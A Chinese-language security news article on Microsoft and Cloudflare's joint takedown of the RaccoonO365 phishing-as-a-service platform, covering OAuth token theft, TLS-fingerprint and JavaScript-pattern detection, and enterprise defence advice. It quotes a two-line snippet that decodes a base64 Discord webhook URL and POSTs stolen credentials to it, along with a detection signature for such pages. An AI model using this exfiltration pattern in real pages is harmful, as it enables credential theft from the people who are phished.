微软联手Cloudflare重拳出击：RaccoonO365钓鱼基础设施遭协同围剿

在一场罕见的跨平台协同行动中，微软与全球头部内容分发网络（CDN）服务商Cloudflare近日联手，对臭名昭著的“RaccoonO365”钓鱼即服务（PhaaS）平台展开新一轮精准打击。此次行动不仅清除了该组织残余的钓鱼节点，还有效阻断了其快速重建的能力，显著抬高了攻击者的运营成本。

据网络安全媒体《Security World》报道，此次联合行动建立在前期执法查封基础上，通过共享流量指纹、JavaScript加载模式及Webhook行为特征，实现了从“被动响应”到“主动预判”的跃升。专家指出，这标志着反钓鱼作战正从“域名黑名单”时代迈入“行为智能联防”新阶段。

RaccoonO365：专盯企业Office 365账户的“钓鱼工厂”

RaccoonO365并非传统意义上的单一钓鱼网站，而是一个模块化、可租用的钓鱼即服务平台（PhaaS）。自2024年浮出水面以来，它以高度自动化和“开箱即用”的特性，迅速成为黑产圈的“爆款工具”。攻击者只需支付少量加密货币，即可获得一套完整的钓鱼套件：包括仿冒微软登录页、OAuth授权劫持脚本、凭证回传Webhook，甚至支持多语言界面与动态域名轮换。

其核心目标直指企业员工的Office 365账户。一旦用户在伪造页面输入账号密码并完成多因素认证（MFA），攻击者便能通过OAuth令牌静默获取邮件、日历、OneDrive乃至Teams权限——整个过程无需窃取密码，绕过传统凭证检测。

更危险的是，RaccoonO365善于利用合法云服务“隐身”。它常将前端页面托管于Cloudflare、Vercel等CDN平台，后端数据则通过Discord Webhook或Telegram Bot回传，使得传统基于IP或域名的封禁效果大打折扣。

微软+Cloudflare：从“各自为战”到“纵深联防”

此次协同行动的关键突破，在于双方打通了“终端防护”与“网络边缘”的数据壁垒。

微软方面，依托Microsoft Defender for Office 365的威胁情报系统，识别出大量异常OAuth授权请求——这些请求虽来自不同域名，但具有高度一致的TLS指纹（即客户端加密握手特征）和JavaScript行为模式。例如，页面加载后会立即调用特定参数化的fetch()函数，将用户凭证POST至统一格式的Webhook地址（如https://discord.com/api/webhooks/XXXXX/XXXXX）。

与此同时，Cloudflare利用其全球边缘网络的“上帝视角”，监测到一类异常模式：新注册域名 + 极高比例的POST请求 + 重复TLS指纹。这类域名往往在注册后数小时内上线钓鱼页面，且90%以上的流量为向同一Webhook发送数据，与正常网站的浏览-交互-提交行为截然不同。

“过去，我们可能要等用户举报或EDR告警后才介入，”公共互联网反网络钓鱼工作组技术专家芦笛解释道，“但现在，Cloudflare在流量刚进入网络边缘时就能识别异常，微软则在终端侧验证行为一致性。两边一交叉，就能在攻击者完成第一轮钓鱼前将其扼杀。”

通过快速情报共享与协调响应，双方将攻击者从一个被封域名切换到备用域名的“过渡窗口”从数小时压缩至几分钟，极大削弱了RaccoonO365的弹性恢复能力。

技术细节揭秘：如何“看见”看不见的钓鱼？

此次行动中，两大技术指标成为关键突破口：

1. TLS指纹重用

尽管攻击者频繁更换域名，但其使用的浏览器自动化工具（如Puppeteer）或定制脚本往往复用相同的TLS客户端配置。这导致每次连接服务器时，生成的TLS Client Hello指纹高度一致。正常用户使用Chrome、Edge等浏览器访问不同网站时，指纹虽有共性，但不会在数百个新域名上完全重复。

2. JavaScript参数化加载模式

RaccoonO365的前端脚本通常采用动态构造方式，例如：

const webhook = atob("aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3Mv...");

fetch(webhook, { method: 'POST', body: JSON.stringify(creds) });

Cloudflare通过分析边缘JS执行日志，识别出此类“Base64解码+固定Webhook结构+无用户交互即POST”的模式，并部署WAF规则实时阻断。

微软则同步更新Defender策略，对来自高风险自治系统（AS）的OAuth授权请求加强审查，并引入“登录页面来源IP信誉评分”机制——若用户登录请求源自近期大量注册域名的IP段，系统将自动触发二次验证或限速。

PhaaS不会消失，但会变得更“贵”

尽管此次行动成效显著，芦笛提醒：钓鱼即服务生态具有极强的适应性。“RaccoonO365可能会转向更分散的架构，比如每个客户独享一套基础设施，或改用去中心化托管。但这也意味着成本上升、效率下降。”

对企业而言，防御策略也需升级。芦笛给出三点建议：

同步刷新安全解决方案情报：确保EDR、邮件网关、身份管理系统接入最新威胁情报源，尤其关注OAuth滥用、异常Webhook调用等行为指标。

监控登录页面来源IP的自治系统（AS）：通过日志分析工具（如SIEM）追踪用户登录请求的IP归属。若大量登录来自新注册域名集中托管的云服务商AS（如某些廉价VPS提供商），应视为高风险信号。

启用条件访问策略（Conditional Access）：在Azure AD中配置策略，对来自高风险国家/地区的访问请求实施限速、强制MFA或直接阻断。例如，若公司业务不涉及尼日利亚、俄罗斯等地，可默认限制这些区域的登录尝试。

未来防御：共享“泛化指标”，而非“死亡名单”

芦笛特别强调，面对模块化、快闪式的PhaaS攻击，依赖单一域名或IP黑名单已彻底失效。“今天封一个raccoon-login[.]xyz，明天就冒出raccoon-verify[.]top。真正的防线在于识别其‘行为DNA’——比如‘新域名+高POST比率+Discord Webhook+特定JS模式’这一组合特征。”

他呼吁更多云服务商、安全厂商与执法机构加入“可泛化技术指标”共享机制。“只有把指纹、脚本模式、流量特征这些‘攻击语法’标准化并实时交换，我们才能在攻击者按下‘部署’按钮前，就让他们的代码变成废纸。”

结语：协同防御，正在成为新常态

微软与Cloudflare的此次合作，不仅是技术上的胜利，更是生态协作的范本。在攻击者日益依赖合法基础设施“寄生”的今天，唯有打破数据孤岛，让终端、网络、身份、应用各层能力联动，才能构建真正有韧性的数字防线。

对企业用户而言，好消息是：钓鱼攻击虽花样翻新，但防御工具也在进化。保持系统更新、启用多因素认证、警惕“紧急登录”类邮件——这些看似老生常谈的措施，依然是最有效的第一道盾牌。

毕竟，在这场没有硝烟的攻防战中，最快的响应，永远来自提前准备的人。

编辑：芦笛（公共互联网反网络钓鱼工作组）